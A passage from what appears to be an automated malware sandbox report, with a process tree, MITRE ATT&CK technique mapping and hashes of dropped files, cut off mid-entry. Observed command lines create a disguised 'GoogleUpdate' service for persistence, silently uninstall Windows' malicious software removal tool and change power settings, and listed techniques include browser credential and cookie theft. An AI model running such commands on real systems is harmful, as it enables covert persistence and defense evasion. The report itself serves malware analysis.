      C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
      4⤵
      Power Settings
      PID:3580
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
      4⤵
      Power Settings
      PID:3828
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
      4⤵
      Power Settings
      PID:6408
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
      4⤵
      Power Settings
      PID:8632
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe delete "GoogleUpdateTaskMachineQC"
      4⤵
      Launches sc.exe
      PID:8100
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe create "GoogleUpdateTaskMachineQC" binpath= "C:\ProgramData\Google\Chrome\updater.exe" start= "auto"
      4⤵
      Launches sc.exe
      PID:8748
  - - C:\Windows\explorer.exe
      explorer.exe
      4⤵
      PID:5848
- C:\Windows\explorer.exe
  explorer.exe
  2⤵
  PID:6996

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:5484

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4820

C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe
"C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe"
1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious use of SetThreadContext
PID:6364

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 6584 -ip 6584
1⤵
PID:2388

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
1⤵
PID:8032

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
1⤵
PID:6372

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
1⤵
PID:1236

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 9096 -ip 9096
1⤵
PID:8040

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 9088 -ip 9088
1⤵
PID:8952

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 7216 -ip 7216
1⤵
PID:3768

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 8468 -ip 8468
1⤵
PID:3668

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 3424 -ip 3424
1⤵
PID:8400

C:\Windows\system32\wusa.exe
wusa /uninstall /kb:890830 /quiet /norestart
1⤵
PID:7368

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

System Services

T1569

Service Execution

T1569.002

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Winlogon Helper DLL

T1547.004

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Image File Execution Options Injection

T1546.012

Netsh Helper DLL

T1546.007

Modify Authentication Process

T1556

Power Settings

T1653

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Winlogon Helper DLL

T1547.004

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Image File Execution Options Injection

T1546.012

Netsh Helper DLL

T1546.007

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

File and Directory Permissions Modification

T1222

Windows File and Directory Permissions Modification

T1222.001

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Indicator Removal

T1070

File Deletion

T1070.004

Modify Authentication Process

T1556

Modify Registry

T1112

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

System Binary Proxy Execution

T1218

Verclsid

T1218.012

Virtualization/Sandbox Evasion

T1497

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Modify Authentication Process

T1556

Steal Web Session Cookie

T1539

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Network Service Discovery

T1046

Peripheral Device Discovery

T1120

Process Discovery

T1057

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Virtualization/Sandbox Evasion

T1497

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Defacement

T1491

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

Filesize
2B

MD5
d751713988987e9331980363e24189ce

SHA1
97d170e1550eee4afc0af065b78cda302a97674c

SHA256
4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

SHA512
b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
d9a93ee5221bd6f61ae818935430ccac

SHA1
f35db7fca9a0204cefc2aef07558802de13f9424

SHA256
a756ec37aec7cd908ea1338159800fd302481acfddad3b1701c399a765b7c968

SHA512
b47250fdd1dd86ad16843c3df5bed88146c29279143e20f51af51f5a8d9481ae655db675ca31801e98ab1b82b01cb87ae3c83b6e68af3f7835d3cfa83100ad44

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
b9fc751d5fa08ca574eba851a781b900

SHA1
963c71087bd9360fa4aa1f12e84128cd26597af4

SHA256
360b095e7721603c82e03afa392eb3c3df58e91a831195fc9683e528c2363bbb

SHA512
ecb8d509380f5e7fe96f14966a4d83305cd9a2292bf42dec349269f51176a293bda3273dfe5fba5a32a6209f411e28a7c2ab0d36454b75e155fc053974980757

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
2061f7f8995a481e9d779a7d07d8e403

SHA1
0011710c44ec76fd5d75a1b91bcc4a3775f5da2d

SHA256
c29bba01ebdc26ae67e3427b0535fa84483b1378f2200e5f658c65c83e1d717a

SHA512
1411e940b141c3a31ce660f15f07b55614206ee4a7593aa49bcfb205260c17831b06c5fe26d9a5e7160c7c18a64cfd9b63c14097d67575db3cf247d63d41cbdd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
21bd7fb60b382905f093b36c6b0732da

SHA1
c9cab8e4f37162fc9719c2522df963fa3794faf2

SHA256
fcc370ff0a31a915f01609f3a2d2be1f2233f8f845d1c4cec90995a67ba13872

SHA512
1d901ab0aad673aace7cc998e536712c0f5c409fc08d5d5a4b1d3296de2d4fe317f28fb4de50c2a9337a223e9f38718e97297893cd287a6058578f8c978d7507

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
0987cf473ff1199d46ef2e39000fae11

SHA1
6cc0b094d46b8e4f421f4fa33c45b585b16cdba5

SHA256
f73ece4d26c749b1cd1fd4f13709e661b053b8e2cc668d7f03a89e68fbcd786a

SHA512
cb2a370899b1024d7c74de7ac0781fe4fdb24e9126c9584b5d6f1be002ea99aaad161ba80437a5ab05317c048fb9c10e0e39a23f807b99f946a87686fcc8f59b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
08d7b58598d132727aa727543eb9e8d8

SHA1
4c46f1ca6f0fe410ad0564b518f47eb139361fd6

SHA256
8605d79069d414432424f4c6991b359b55d317d0e806a171b831157d0f065d07

SHA512
5ac9f582af3501875b02bf09b78904736e59538105a28fdd646fd06382e8582db72e5c55f7a6ab2324f843484c44c21fce4957b2b19cce76aa7b5f56709d5aab

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\data_0

Filesize
44KB

MD5
aefdc2a8028af454f14ba246ccabc7bc

SHA1
6c156aab38e9ecc3d4f884a4bdf1f94323b5eef9

SHA256
4affb7cb59126248a37291248e4e21f9e65b195ad66af1ac6ba1ee573f4c4d2d

SHA512
de49b775b14884d83f17c1a478716ff102c1959bf12e250b7aea5051b87a0091337441af3216e3c8c623e9cd0f22c1f70139ae39d521f96617dce84970285915

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\data_1

Filesize
264KB

MD5
290a1092274b174a830302c73386c0a1

SHA1
9704ca27d720c0a595dbc64682120d015eadece3

SHA256
b9b3359c69f501e374167e8298b38da5058595aa1904ad31a982e8a64fed4492

SHA512
3d64b2574e0a93ba86d1a1c8986838dfa5b9997ede897f5a1354f4a21285036d4cbeab01ec8c5d50b1d90ee86c27c3358c820e8d3facac4a6c17362caf5ea005

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Edge Profile.ico

Filesize
70KB

MD5
e5e3377341056643b0494b6842c0b544

SHA1
d53fd8e256ec9d5cef8ef5387872e544a2df9108

SHA256
e23040951e464b53b84b11c3466bbd4707a009018819f9ad2a79d1b0b309bc25

SHA512
83f09e48d009a5cf83fa9aa8f28187f7f4202c84e2d0d6e5806c468f4a24b2478b73077381d2a21c89aa64884df3c56e8dc94eb4ad2d6a8085ac2feb1e26c2ef

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
1KB

MD5
8124fb20cfa5a6d8c118d3b4f72e6447

SHA1
3ce2184340df36bf511f71edd42c2e275cf31135

SHA256
84152af285a49223245fe6051be208f55c450be94752e1487bb55aa054bee75e

SHA512
cdf7e2f11750ba69b62b0ee2dbea4ff9a7c681033688f79f149ffced57e2aabc7027d17709f3fee98452efdea11c1d3c6e5965e6674c014954f101c5d6b37899

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
1KB

MD5
f55071585a7fa8070bdbbc74e8dd8977

SHA1
1c43ee19922637460815dc5e537ef7de474c11e8

SHA256
05e329a17d30bbca37a679904274e08a63d0c781911908f88e2bca963756fbd9

SHA512
c70897e68e9c8e73a8f29202bab22a0afcb33ba0ec59a4dd05256340c77a0e6a904f5dd4211fab65569fe2d1292a80a2bf1a92be4c476bbc5dade558dcd090cd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
7KB

MD5
202f48b603899c72ed89362a57c25fee

SHA1
4631ac615d9ca379311539b169e0ab5285cbff2b

SHA256
a33b1333376ee30856f6d447bb5f7d88a07d339c659bf48f486b02cfb9f0e458

SHA512
c4558e35165755a78d5d53e458f7fab61290428ee72d4369b2c0ad0d48d9185413d079bd2ee977ffd94e3ffadb1708b6836bef28da8e6bcb2c5d79fb8802d738

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
7KB

MD5
a24174b75a4a59475e8e25c12dcec630

SHA1
d1206394700f3fb1d8c6168f53f07ec07ff2d7d1

SHA256
3206a2e8ed18d56cc6c9c470cd3dca51704bf6416e881390b912a3af0666d5f6

SHA512
01050e7838cadfba0f81db3d61a9652550b76e1de68484d90fd884cf0192f468978e4e951886fcea25a32032bdd59f13078092175d27da617bb28e92df0ca43a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
9b45cd92da440257617a5011d73bed88

SHA1
f34310e70d845596bac60a1d5d3b85ae5246b676

SHA256
656a727de92cf561df0bb7f37b2285244181493f7a379c8155ad74c8530de7cb

SHA512
c3cebb6b095e39e894eb40be4cba089c967cc8f0a2d0895ac816a9baf3c3d78c86a05390a1721f84910f8d8dd6d326d6fd880cd731f56e1af2789d591fdc6d22

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
30e50edf465e9a4411da05b9270ca83d

SHA1
cb2a8de7ae57e2044961980975cb0056e084b136

SHA256
a5660164b4a5cb18e6d6f048569affadd345e7817bbfc241d45d57505b0d581c

SHA512
b1e8ad204a4a1586e27faf8279c4ed4119fa01d02f77ef26631f3b56141bab735da987fab0eee965008c77071daff49e25dc23fe228e2cb7b5c006ba62c8ab98

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
a4965ad25e79e02b5c211c813114ea6c

SHA1
a4a25dc9b3146063f8d9f76aad045abedab79ff4

SHA256
c8bc3293d71537b3d8a9e974b156bb844df013c6b239c3c04d765a4076c59eb2

SHA512
1235ea53ba9acf1605e8492d84a0631b31b084cf80ac1f02856bb092bbd67940d043dac29cf75e08c934e4a5f2c9a841254bb640357a5e345f0c0d2a031332d0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
4KB

MD5
dc5bf97de98160c0ec6273d0566d1305

SHA1
a642084b0f15b84f430af28e47b577f6bf616ffe

SHA256
71298ae9ff4ea00c14ecfe9b09e2661eb0d171559d846c74df97b58ee3fb9614

SHA512
dcc1711fc0148bc9326fffa174a320e169216118be7782c5d94f9993ed2f65b574b4e13d418fb13fbb6d44e2cf260378873fc6e8e53ae867c0060cc201dfb9c0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
51f5a5610afdff7974588ab3474d92ba

SHA1
16acd3eee0921a013cb444befc5a6be6cc0419fb

SHA256
b9c8af0da58ba4c2b01b5f7a0d1c1cf94567e674687ee1c7c39a1b8962af10cd

SHA512
3c07ae794e1345889cad20c390d17ea5afa25aa79e9974cd16d79054de2deddbf39a9fb46a2f2081d0f2ed466da7698ac3ff0e1870ba9909e58e66c08d6a7ef9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
c8f7e74d76c90a23d0af468dc791313f

SHA1
b59275ca97977b0d0851161736fb349d70feb883

SHA256
d17c1c7d34bbdddee0de6064a99aa9bab89c6332deb62925d993471495114248

SHA512
883e4dbe2c473d250d6afa9bb98a058c4e03c1f2d29225471e4616c7bd203308af753ef3eccafb0109235e6e9fe9b185f1e0385c2826c1148cc37b9378c46e00

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
104722c3aaf784c96b80d36b002ee106

SHA1
5bcfd3b985b9b4e012c9b84e14af7e0e8441f0ff

SHA256
b831490f952a6404ae10b218e545de1581b4921c667522a0d5fcdc7f4c687599

SHA512
1eb50a653659538caf002c01765cb90fd3a6f133440cb68972b8c9d3b2d2b34f899393ac4137a3db7112528a5b4f1ce7125988c90cab0b127c051d03432ad8be

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
cbfec3cf20519a775a0ddc6f6e5cea41

SHA1
3939f177af63d152a830a4d9f440b291f3109988

SHA256
52a509170aa527e5d96662425b481d3618efbbe1035ed734b5186648795bf373

SHA512
60f43f762af3e3dcef5f8e8cc51818fbdf84740746b20848d88f84fa7c2fe3eaeb4af4f7adc930653f52b58d17fe318a5891586aeee101ea903a36ac20658170

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences

Filesize
24KB

MD5
f9055ea0f42cb1609ff65d5be99750dc

SHA1
6f3a884d348e9f58271ddb0cdf4ee0e29becadd4

SHA256
1cacba6574ba8cc5278c387d6465ff72ef63df4c29cfbec5c76fbaf285d92348

SHA512
b1937bc9598d584a02c5c7ac42b96ed6121f16fe2de2623b74bb9b2ca3559fc7aff11464f83a9e9e3002a1c74d4bb0ee8136b0746a5773f8f12f857a7b2b3cb4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences

Filesize
24KB

MD5
c029e76a78f124ad4aea56fa5196df7e

SHA1
e6794d580c9753f35c7e0ff6813c27fb3a3cd5f7

SHA256
9856a3a27dce1d7578353c623de39a2304fb02a4a543497e2ad4804fa03ecc4b

SHA512
cabc52938d407fa27147eaa7904f60fdce79eef6236e75f5dccdc4da1d58891c379635bd1f562c38268ef4c3476e30015396d09434cc008b54465f92959c3344

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
6752a1d65b201c13b62ea44016eb221f

SHA1
58ecf154d01a62233ed7fb494ace3c3d4ffce08b

SHA256
0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

SHA512
9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
206702161f94c5cd39fadd03f4014d98

SHA1
bd8bfc144fb5326d21bd1531523d9fb50e1b600a

SHA256
1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167

SHA512
0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\e13961d2-ac5b-48a5-af83-f40f8e8e96d5.tmp

Filesize
1B

MD5
5058f1af8388633f609cadb75a75dc9d

SHA1
3a52ce780950d4d969792a2559cd519d7ee8c727

SHA256
cdb4ee2aea69cc6a83331bbe96dc2caa9a299d21329efb0336fc02a82e1839a8

SHA512
0b61241d7c17bcbb1baee7094d14b7c451efecc7ffcbd92598a0f13d313cc9ebc2a07e61f007baf58fbf94ff9a8695bdd5cae7ce03bbf1e94e93613a00f25f21

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\CURRENT

Filesize
16B

MD5
46295cac801e5d4857d09837238a6394

SHA1
44e0fa1b517dbf802b18faf0785eeea6ac51594b

SHA256
0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

SHA512
8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\MANIFEST-000001

Filesize
41B

MD5
5af87dfd673ba2115e2fcf5cfdb727ab

SHA1
d5b5bbf396dc291274584ef71f444f420b6056f1

SHA256
f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4

SHA512
de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
12KB

MD5
9625d9d0bbeb4a3f350388dfef2162b6

SHA1
0828fe75ed027766a3c2a7d7789979483ab70b5e

SHA256
9eb3f680b03a8157c1ef485ae4410c4c2ae76cb5ec0da4945c1424e5a9b4b2ff

SHA512
c0719704fe02d6fd0303b19f08723f11ee85b52db3caae034d994ed75cd3607a62b55f8623f3976a3c6b0bae25cc550b8bfb4ff4ac9e4f17d8be05dbd875d0fc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
bf688ff8807a55efe28fec8c4fa4751b

SHA1
5d40e369c447b35e5d3594ddb6d7b1f9e5b5ac1a

SHA256
c26c2161ef8eb5ef0b650746cde356e059509459635d0f1b3821778e4a930d26

SHA512
7439be26d088dc8426c7801a3b22acf72130bfcddea917f3f30a3867ad60e6eb8f56b935a6a6a1956fc1c95d659bdc108cc647f48f090b1bea470cfe75a2df04

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
e5126fa83f8d25524cee5f650c60d218

SHA1
4a42cb8e4d85dd58b8bcf4d8cddb2da39ecc9ebb

SHA256
aaf29369f0bcdc1fd5a5e64fa8320c6df88bf36a43d230299bcc196363ab774e

SHA512
eb1128ea7830f9a93fb9177ec065bf3fb7bb7b3130e360071059436268b8aebfaea5588df624e2e3b77904a430bbb3a9a59f29e23b10af34ec5d425e2517f9e1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
8d20bf066cd0226e9d088c53a01bd6bc

SHA1
5024f33f0e678c039b8b2cf882f17f06e2ee799e

SHA256
c94152148431e97aed50962b6ab36ceded979ff578e433e1bc537bc7d4e30a32

SHA512
824dbfd75c049d3c2d64f92261c84a809024bcd9da779e8858d36b542957687c50eed69fb27d571893564ea42f5282b9a941f8aa4a5f2714566c47213ed68aba

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
8KB

MD5
d0f25429c681a192142102361eb129a4

SHA1
88ba87de9176b344d85675c236bb6fdc674da126

SHA256
922ad978e627fd7139a42f137cb2df41fbb92abeaa7edd7754cff24f92d9aabb

SHA512
dbde2eecacf0e12740dc0a38e9b030367e5410f50a308d9925fd800b2891fd674c4ee35627a0a8fce71e3b3861e7995975b2e314fd7b1b409a0148e2de303dc9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
12KB

MD5
6108e1b8c4c3008bca85441c5d0dd040

SHA1
f830a9bb0b6b6fbfa9f87a865300c965167ef8c4

SHA256
cc7711fc7938804bef9ebeb8c20f9376e44f21ed589a9cf83eca1493d49dc366

SHA512
eeabb1e899e261ee052cec35812d8d2563fd563d02e819d2d4712b5648058982ce3699d146f5a413ab1cbf9430a3d139dd8791c157a66611926eff3e28a5ce1b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\ShaderCache\GPUCache\data_1

Filesize
264KB

MD5
f50f89a0a91564d0b8a211f8921aa7de

SHA1
112403a17dd69d5b9018b8cede023cb3b54eab7d

SHA256
b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec

SHA512
bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\KMZNQ6LU\soft[1]

Filesize
1.4MB

MD5
a8cf5621811f7fac55cfe8cb3fa6b9f6

SHA1
121356839e8138a03141f5f5856936a85bd2a474

SHA256
614a0362ab87cee48d0935b5bb957d539be1d94c6fdeb3fe42fac4fbe182c10c

SHA512
4479d951435f222ca7306774002f030972c9f1715d6aaf512fca9420dd79cb6d08240f80129f213851773290254be34f0ff63c7b1f4d554a7db5f84b69e84bdd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\RQSM4XQ2\download[1].htm

Filesize
1B

MD5
cfcd208495d565ef66e7dff9f98764da

SHA1
b6589fc6ab0dc82cf12099d1c2d40ab994e8410c

SHA256
5feceb66ffc86f38d952786c6d696c79c2dbc239dd4e91b46729d73a27fb57e9

SHA512
31bca02094eb78126a517b206a88c73cfa9ec6f704c7030d18212cace820f025f00bf0ea68dbf3f3a5436ca63b53bf7bf80ad8d5de7d8359d0b7fed9dbc3ab99

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\afyb4qvh.default-release\activity-stream.discovery_stream.json

Filesize
24KB

MD5
f27ce41faf08e211825033fb1f7d7f51

SHA1
da1e4d65eeb5b00c120f45a51d0a6c20c2b736e5

SHA256
dbd9c49c6723768ae51e5c3fa1471ee4cc2131a51dce0667f6de1864df676ec3

SHA512
fc20a3481a233273a2ca7f959f871842ba593d68b337ef0d7ff09d7f0b57bdedd3d4f0d10fff2a71c7dbd9f06955a21a9c3c8044f444c6822757d4e21236f571

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\afyb4qvh.default-release\cache2\entries\D0F48A0632B6C451791F4257697E861961F06A6F

Filesize
134KB

MD5
4a94d671f82186b883f89b2161ecb4d7

SHA1
f12f99117e810cc93e64e766c650c47ef2a4c3a4

SHA256
b3c2545aadfcdc038c8b006f4d46a1132be123533e13e52ace81e3e572d36d4e

SHA512
26e660d4eb9a177b2d66be5ad250daf6c61b99dacbb84a257af44aefe5bc671755fdc92244b2cadf39c827b41e1f8aff58b2eb69654b95eba75b1f54d41cf364

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\afyb4qvh.default-release\startupCache\scriptCache.bin

Filesize
8.6MB

MD5
42ef850edbc139a84e7e3b20653f072a

SHA1
8f4865cac36ba29890d1d0bbec93d36393d545c4

SHA256
4770d7a9a2fb83641bca7ba915eadd15fd6349d4a0fe3e37627550453feb08e5

SHA512
aceaca216366d624744005c55acc2c11c065bdf54c309358973d9cec1fca7f9cd9b12573c2be7487dba3e5147ef8b01ccf9237492bf8086deb3799eceab217f6

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\afyb4qvh.default-release\startupCache\urlCache.bin

Filesize
2KB

MD5
6c864cd39ac329e5044593be48fc892b

SHA1
5e8e13ebcbd3b8aca270677dc955336d7c9a498b

SHA256
b2daaec5ab3c5c0d3d09b2743aa88a901821b8a25c522cdea061afc994698f2d

SHA512
aa3a37e1e59ee650431ef432a6f9a677154f7708b5d1c270ffc00b97d62f596ae86956bd74681d2f3a9d3a140504cec7df6efba5af11cb8b0f7678641cf0430a

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\afyb4qvh.default-release\startupCache\webext.sc.lz4

Filesize
107KB

MD5
57e70e4ffd50bd76f83a4673f42fdee9

SHA1
77c67126c819062026145d3a7b66ad134a1cefff

SHA256
b6a58161b347a5e823a31f60871cda93c3a06c1a5c9c11fbe4fc108ac49f8ab3

SHA512
b93dcf98d90016be56bad0ad18fe388d038c82654dae5758cee2c74b45b369fec74ea18767bf487eefba41ba3eb0cade8371862d3dce0f62c64466bbd965283d

Download Submit
C:\Users\Admin\AppData\Local\Temp\0AQ9JRhOIXsM.bat

Filesize
195B

MD5
954e89ed0e998f9fa9a5b35458ad7e62

SHA1
f203d6b9e0d3f251921a994dd477989ed7aebcda

SHA256
b805ef5cede94ab3903cdd1a73b8c6253649758168b6dc077d56449689cd9c1d

SHA512
016899c6965a551160de62ae77c997cebf01e898a4784f624a40577991b51dc32b1d946f9b2efe6f2d0d0995f55c78ef9a81e81667cbeb8359632e913de972ef

Download Submit
C:\Users\Admin\AppData\Local\Temp\18xVaLQq2kg6.bat

Filesize
195B

MD5
95023c06756ee903986b41dbbcb305a3

SHA1
bb415b4ab74cced83e42afb575f4511b1c627dea

SHA256
2bfba2e86b20a87f3cab8bfdd860ebcc062a925443d212f590a3a2812899ae3d

SHA512
80a6fd5bc562d14be3175a920129b594c1f3f26c4b9deb28e2286e0d87f5fa0ef406ac1b48eecba4c3dc8df26ce9ac94cb1d80582313dc24615ebb1c811f9470

Download Submit
C:\Users\Admin\AppData\Local\Temp\5G6VEn3n4URD.bat

Filesize
195B

MD5
0629901d64b62f4d1f3b17c956914673

SHA1
8e5952dedf1a1df41e59ea38f18de00fdfd893a3

SHA256
c7a7afc7f95d0e7c068b312e61de6d7e68c9728d9db2cbbc75b198cac7ff0946

SHA512
bcc7554d7f53118b70aff1a0016c654b1f9a0981f7773a20bc3f6a64d97a74c6c9c1126f9a5812f0e50d35897633edba06a6dd0e1bc4cf2c8c9e9242384f9166

Download Submit
C:\Users\Admin\AppData\Local\Temp\7ZjR8cBUtfSM.bat

Filesize
195B

MD5
b75577c40130a1096f4abb0b38cf0f91

SHA1
5f66c999e5297e7b5d5814e458be1d49dd5722ed

SHA256
6a441bb153b78042cdec8a94d82024514dfbaf209db52ecb5c1f0c1e5cb0fea6

SHA512
fb1baf631e032968c9794efbc7a92e68c4ac49afe36710558abb448d56a6bb6698dbba3c5b170ea39422f7a3eb8e2853d36d5a5967f4bd3ff31c66b84715af99

Download Submit
C:\Users\Admin\AppData\Local\Temp\7w7P7hBjVo6E.bat

Filesize
195B

MD5
a87c4aab1c36f69e6807a9cbfaa1b890

SHA1
7681a0adbfd03857175a1eec920aea618cc35547

SHA256
4f1f31445c0724c7550d577ba1f95feef283c4a012ac45ebaf303e596b2a246b

SHA512
48522e7550d5d5f2ad9020cbe104e5fbef0639124e98398aee970b30261ae0156ece356cd624739cb7ca2c65561d72ac7d9e5095a6ed3ea117486b83d35aab3f

Download Submit
C:\Users\Admin\AppData\Local\Temp\Alfa\Browsers\Admin\Edge\Default\history.txt

Filesize
520B

MD5
436ee9b5fb4ecf368ef9a21ed86182bf

SHA1
e06059c665f2fa39edeee9b24ef35f3efb5fc74d

SHA256
